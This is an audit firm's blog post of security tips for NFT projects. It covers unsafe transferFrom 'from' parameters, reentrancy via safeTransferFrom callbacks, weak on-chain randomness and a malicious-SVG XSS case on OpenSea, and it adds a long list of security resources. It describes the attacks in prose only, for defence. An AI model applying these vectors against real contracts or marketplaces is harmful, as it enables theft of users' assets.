# Auditing Tips for NFT Projects By [Officer's Blog](https://paragraph.com/@officercia) · 2023-01-24 --- **Greetings, dear readers!** We continue our [series](http://blog.pessimistic.io/) of educational articles and today we’ll study how to secure your [NFT](https://officercia.mirror.xyz/VD9IDI8b4jVBHbr5uaGcI_ev6NEKZUuuOhL9IpEfpZs) project! In this article, I’ll give audit and development tips, as well as put together well-known resources in the [SoK](https://www.jsys.org/type_SoK/)! Make sure to read the rest of the series: ----------------------------------------- * [Convex Finance DeFi Integration Tips](https://blog.pessimistic.io/convex-finance-defi-integration-tips-1bacfe73d3ce) * [CurveV1 Integration Tips](https://blog.pessimistic.io/curvev1-integration-tips-a49af7b4b46a) * [BalancerV1 Integration Tips](https://blog.pessimistic.io/balancerv1-integration-tips-594067785e8b) > _I will also share our own observations and give some advice in the next article in our series, since our_ [_team_](http://pessimistic.io/) _has been working since 2016, we have accumulated quite a few of them._ [ How to Defend Your Castle | Innovative Trio in Smart Contract Security: Monitoring, Prevention... ------------------------------------------------------------------------------------------------- How to Defend Your Castle | Innovative Trio in Smart Contract Security: Monitoring, Prevention, Defense Looking at this month's never-ending hacks, one wonders why they happen so frequently. Have ... https://blog.pessimistic.io ![](https://storage.googleapis.com/papyrus_images/f3387ed72e272deaf1290b026330f0416732e8c19ba56e5b6c000e717b3500c6.jpg) ](https://blog.pessimistic.io/how-to-defend-your-castle-innovative-trio-in-smart-contract-security-monitoring-prevention-c8885304035a) First and foremost, I would like to express our sincere gratitude to the authors of all the resource materials, and of course our [pessimistic.io](http://pessimistic.io/) auditors who have helped [me](https://officercia.mirror.xyz/) so much by revealing needed information and lifting the curtain of secrecy! Understanding Security Issues in the NFT Ecosystem * [www.researchgate.net/publication/356339205\_Understanding\_Security\_Issues\_in\_the\_NFT\_Ecosystem](http://www.researchgate.net/publication/356339205_Understanding_Security_Issues_in_the_NFT_Ecosystem) There have been several instances of NFT hacking and exploitation in the past, and it’s important for [NFT](https://officercia.mirror.xyz/VD9IDI8b4jVBHbr5uaGcI_ev6NEKZUuuOhL9IpEfpZs) users to be aware of these risks and take steps to protect their assets! [ Retrospective: Hacks in Web3 ---------------------------- Retrospective: Hacks in Web3 Just spotted an awesome retrospective on hacks, happened ... https://coinsbench.com ![](https://storage.googleapis.com/papyrus_images/f0914844ba0c7a33508e8afcdce668011cacb250d3eda89cc62049452c8a0014.jpg) ](https://officercia.medium.com/retrospective-hacks-in-web3-cc83b8ee0e93) **We believe there is no one who doubts that the basis of any secure integration is a special approach to writing code.** Consequently, this article will be focused only on those aspects that can be really useful for making your code safe and secure! Therefore, below you will see not a typical article, but a Systematization of Knowledge — [SoK](https://www.jsys.org/type_SoK/), in which I will rely on Authors that I myself trust in this matter, and of course our [**pessimistic.io**](http://pessimistic.io/) auditors! **Let’s get started!** * * * **By the way, here are some vacant slots in the first quarter of 2023 now so if your project needs an audit — feel free to** [**write**](http://pessimistic.io/) **to us, visit our public reports page** [**here**](https://github.com/pessimistic-io/audits)**! Let’s get in touch:** [**gm@pessimistic.io**](mailto:gm@pessimistic.io)**!** * * * I — We Recommend ---------------- Since our [team has been working since 2016](https://github.com/pessimistic-io/audits), we have accumulated quite a few observations, which we will share below along with several security advices: * If the contract has [**.(safe)transferFrom**](https://stackoverflow.com/a/67383742)**, then in 99% of cases from parameter must be** [**msg.sender**](https://forum.openzeppelin.com/t/is-there-any-standard-to-let-msg-sender-reveal-delayed-nft/34118)**. Otherwise hacker can take advantage of other user’s** [**appovals**](https://revoke.cash/) **and rob them!** * If there is [**.transferFrom**](https://veridelisi.medium.com/learn-erc20-in-solidity-transferfrom-function-ceb0a304163) **in the contract, users must not manage the from parameter. Otherwise hacker can take advantage of other user’s** [**appovals**](https://revoke.cash/) **and rob them! In 99% of cases from should be just** [**msg.sender**](https://code4rena.com/reports/2022-05-cally/)**.** * [Remember](https://blog.pessimistic.io/slither-an-auditors-cornucopia-a8793ea96e67) that the **OpenZeppelin** implementation of [**ERC721**](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v4.4/contracts/token/ERC721/ERC721.sol#L389) and [**ERC1155**](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC1155/ERC1155.sol#L476) vulnerable to [**reentrancy**](https://blog.pessimistic.io/reentrancy-attacks-on-smart-contracts-distilled-7fed3b04f4b6) attacks, since [safeTransferFrom](https://stackoverflow.com/a/67383742) functions perform an external call to the user address (**onReceived**)! * On-chain “random” (based on gas cost, block hash, and stuff like that) is unreliable, **it can be bypassed** (e.g., one can buy specific NFT). Consider using [**Сhainlink VRF**](https://chain.link/vrf) or a custom solution based on something like [random.org](http://random.org/)! Flash Crash for Cash: Cyber Threats in Decentralized Finance * [arxiv.org/pdf/2106.10740.pdf](http://arxiv.org/pdf/2106.10740.pdf) * * * II — A Tiny Tip --------------- Keep in mind that NFTs which are being added to the marketplace by users can be malicious themselves! [![]({{DOMAIN}}/editor/youtube/play.png)](https://www.youtube.com/watch?v=7hSijl1TFjA) > _TLDR: The trick the platform in turn allows assets to be uploaded as files up to 40 MB in size with any of the following extensions: JPG, PNG, GIF, SVG, MP4, WEBM, MP3, WAV, OGG, GLB, GLTF._ * [Learning Best Practices from Web Applications to Avoid Similar Security Vulnerabilities in Decentralized Applications](http://www.theseus.fi/bitstream/handle/10024/170724/Aboualy_Mahmoud_bachelor_thesis.pdf) > _Knowing this, experts on video uploaded an SVG image containing malicious JavaScript code to OpenSea. When they clicked on it to open it in a new tab, they found that the file was running in a subdomain of storage.opensea.io. The researchers then added an iFrame to the image to load HTML code that would inject the window.ethereum request needed to establish a connection to the victim’s Ethereum wallet._ [https://3bodymo.medium.com/exploiting-cross-site-scripting-xss-in-web3-c8e00aeea22a](https://3bodymo.medium.com/exploiting-cross-site-scripting-xss-in-web3-c8e00aeea22a) Use [scanning](https://start.me/w/aJxMm0) ([1](https://www.virustotal.com/gui/home/upload), [2](https://app.any.run/), [3](http://dangerzone.rocks/)) or [other methods](http://dangerzone.rocks/) of protection. Be aware of possible [Passive XSS](https://www.makeuseof.com/cross-site-scripting-attack/) or **Iframe** attacks! * [Follow this quality checklist before an audit](https://blog.openzeppelin.com/follow-this-quality-checklist-before-an-audit-8cc6a0e44845/)! * [How to not suck at an audit?](https://docs.google.com/presentation/d/1McKvyOPh7Q_alXeT1Y29yGtulKJtdFgQZXqLpsbS6Ow/edit#slide=id.gae3c258275_0_238) * [Solidity Audit Checklist](https://github.com/Rari-Capital/solcurity) * [How to read an audit report?](https://bowtiedisland.com/how-to-read-a-smart-contract-audit-report/) * [Best practices!](https://consensys.github.io/smart-contract-best-practices/) * [Smart Contract Verification Standard](http://securing.github.io/SCSVS/) It is **very** important to mention that [**Sandboxing**](https://twitter.com/apoorvlathey/status/1616566255380725770) also prevents the **iframe** from importing its own [MetaMask](https://github.com/0xngmi/metamask-extension/tree/Version-v10.22.23) (or, let’s say, [frame.sh](http://frame.sh/)) instance! * * * III — Data Sources ------------------ ### NFT attack vectors: * [Access control on a NFT Solidity Contract](https://miguelrodrigues.org/post/nft-with-access-control/) * [Reentrancy Attacks on Smart Contracts Distilled](https://blog.pessimistic.io/reentrancy-attacks-on-smart-contracts-distilled-7fed3b04f4b6) * [Reentrancy Attacks](https://github.com/pcaversaccio/reentrancy-attacks) * [Approve Scam VS Sign Scam](https://officercia.mirror.xyz/Y3xDO0XlAvIzJBwNhFZnvPWLiztWxIp1KHqg-B0kKxI) * [NFT Attack Vectors](https://github.com/Quillhash/NFT-Attack-Vectors) * [How Can a Simple Signature in Metamask Drain Your Wallet?](http://typefully.com/korpi87/iHknFMq) * [NFT Security in Blockchain](https://quillaudits.medium.com/nft-security-in-blockchain-quillaudits-ba52d0bdfe26) * [NFT Anti-Hack Checklist](https://github.com/Quillhash/NFT-anti-hack-checklist) * [Profanity: Clarifications](https://officercia.medium.com/profanity-clarifications-df3972c8c006) (suggest [using this **safe** tool instead)](https://github.com/1inch/profanity2)! * [What’s in Your Wallet? Privacy and Security Issues in Web 3.0.](https://arxiv.org/pdf/2109.06836.pdf) * [Learning Best Practices from Web Applications to Avoid Similar Security Vulnerabilities in Decentralized Applications](http://www.theseus.fi/bitstream/handle/10024/170724/Aboualy_Mahmoud_bachelor_thesis.pdf) * [Are NFTs Safe? How to Ensure Security of Your NFTs?](https://hacken.io/discover/are-nfts-safe-how-to-ensure-security-of-your-nfts/) ### Check out: [https://medium.com/immunefi/how-to-find-xss-vulnerabilities-in-nft-marketplaces-e190bd8cb8ad](https://medium.com/immunefi/how-to-find-xss-vulnerabilities-in-nft-marketplaces-e190bd8cb8ad) [https://composable-security.com/blog/nft-best-practices-build-safe/](https://composable-security.com/blog/nft-best-practices-build-safe/) [https://medium.com/cryptodevopsacademy/solidity-security-the-reentrancy-guard-pattern-c587332b1278](https://medium.com/cryptodevopsacademy/solidity-security-the-reentrancy-guard-pattern-c587332b1278) ### Researches: * [NFT Security Ultra List](https://graph.org/NFT-security-01-28) * [All Known Smart Contract-side and User-side Attacks and Vulnerabilities in Web3](http://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31) * [Vul](https://github.com/Quillhash/NFT-attack-vectors)[nerabilities and Anomalies in NFT Marketplaces](https://atrium.lib.uoguelph.ca/xmlui/bitstream/handle/10214/27173/Ruan_Xiangyu_202209_MSc.pdf?sequence=2&isAllowed=y) * [Top NFT Incidents of all time](https://www.h-x.technology/blog/top-nft-incidents-of-all-time) * [The State of Crypto Security](https://thecontrol.co/the-state-of-crypto-security-d628ac5b609d) * [Metaverse Security and Privacy: An Overview](https://arxiv.org/pdf/2211.14948.pdf) * [Financial Crimes in Web3-empowered Metaverse](https://arxiv.org/pdf/2212.13452.pdf) * [Fusing blockchain and AI with metaverse](https://arxiv.org/pdf/2201.03201.pdf) * [Attacking the DeFi Ecosystem with Flash Loans for Fun and Profit](https://arxiv.org/pdf/2003.03810.pdf) * [NFT Wash Trading: Quantifying suspicious behaviour in NFT markets](https://arxiv.org/abs/2202.03866) ### Front-end security: * [Front-end Attacks](https://medium.com/beaver-smartcontract-security/defi-security-lecture-4-front-end-attack-44f32ca0cd68) * [Web2 Security meets Web3](https://blog.embarklabs.io/news/2020/01/30/dapp-frontend-security/index.html) * [DApp Security](https://mirror.xyz/0x90f2036E332dfAD451ba9E9C82366F4ba79173d8/tJf6H6wsOfOGJIdWqopK7iopcuD0NRxdmn1_de2m_Lo) * [Understanding Security Issues in the NFT Ecosystem](https://www.researchgate.net/publication/356339205_Understanding_Security_Issues_in_the_NFT_Ecosystem) * [A Survey on Metaverse: Fundamentals, Security, and Privacy](https://arxiv.org/pdf/2203.02662.pdf) ### OpSec: * [Security MVP from Trail-of-Bits](https://docs.google.com/document/d/1-_0Wlwch_vtkPM4F-SdEXLjQYaYT7KoPlU2rjt7tkLQ/edit) * [How to Defend Your Castle](https://blog.pessimistic.io/how-to-defend-your-castle-innovative-trio-in-smart-contract-security-monitoring-prevention-c8885304035a) * [**OpSec Guide**](https://github.com/OffcierCia/Crypto-OpSec-SelfGuard-RoadMap) * [Telegram & Discord Security Best Practices](https://officercia.mirror.xyz/dlf6ZEXq3FLE21ZY2jeJ0cBDyuZu8XIF9DEJAQ07nk8) * [What to do when your Web3 project Discord server is hacked & how security audit may prevent it from happening](https://officercia.mirror.xyz/x4nGX6YwhhmHj8TaQ53kBR5b5M1Ei_Y9_l1Vpext-Hk) * [Violent Attack Vectors in Web3: A Detailed Review](https://officercia.mirror.xyz/qfhQ_ocTPKnO5EqMlZ2ixIX7oBIfz5Tznid82EucbYk) ### Pre-Audit: Yet another tiny (non-binding) tasks you should do before an audit: 1. Before an audit, make up your Tech docs - be sure you have an architectural diagram, NatSpecs & Code comments; 2. Provide extensive unit/integration testing suite; 3. You should have a list of protocol invariants somewhere… [https://composable-security.com/blog/threat-modeling-for-smart-contracts-best-step-by-step-guide/](https://composable-security.com/blog/threat-modeling-for-smart-contracts-best-step-by-step-guide/) [https://docs.google.com/presentation/d/1McKvyOPh7Q\_alXeT1Y29yGtulKJtdFgQZXqLpsbS6Ow/edit#slide=id.gae3c258275\_0\_238](https://docs.google.com/presentation/d/1McKvyOPh7Q_alXeT1Y29yGtulKJtdFgQZXqLpsbS6Ow/edit#slide=id.gae3c258275_0_238) Thank you! ---------- * * * We hope that this article was informative and useful for you! Thank you for reading! _What instruments should we review? What would you be interested in reading about?_ * * * Support is **very** important to me, with it I can do what I love — educating users! * [Check out my GitHub](https://github.com/OffcierCia/) * [Follow my Twitter](https://twitter.com/officer_cia) * [Track all my activities](https://start.me/p/QRg5ad/officercia) * [All my Socials](https://linktr.ee/officercia) * [Join my TG channel](https://t.me/officer_cia) [https://github.com/OffcierCia/support](https://github.com/OffcierCia/support) If you want to support my work, you can send me a donation to the address: * [**0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A**](https://etherscan.io/address/0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A) or [officercia.eth](https://etherscan.io/enslookup-search?search=officercia.eth) — ETH, BSC, Polygon, Optimism, Zk, Fantom, etc * [**17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU**](https://blockchair.com/bitcoin/address/17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU) — BTC * **4AhpUrDtfVSWZMJcRMJkZoPwDSdVG6puYBE3ajQABQo6T533cVvx5vJRc5fX7sktJe67mXu1CcDmr7orn1CrGrqsT3ptfds — Monero XMR** * [DeFi Roadmap grant page](https://gitcoin.co/grants/3150/defi-web3-developer-roadmap) [https://officercia.medium.com/if-you-have-been-scammed-9ce21ee120e6](https://officercia.medium.com/if-you-have-been-scammed-9ce21ee120e6) Stay safe! ---------- --- *Originally published on [Officer's Blog](https://paragraph.com/@officercia/auditing-tips-for-nft-projects)*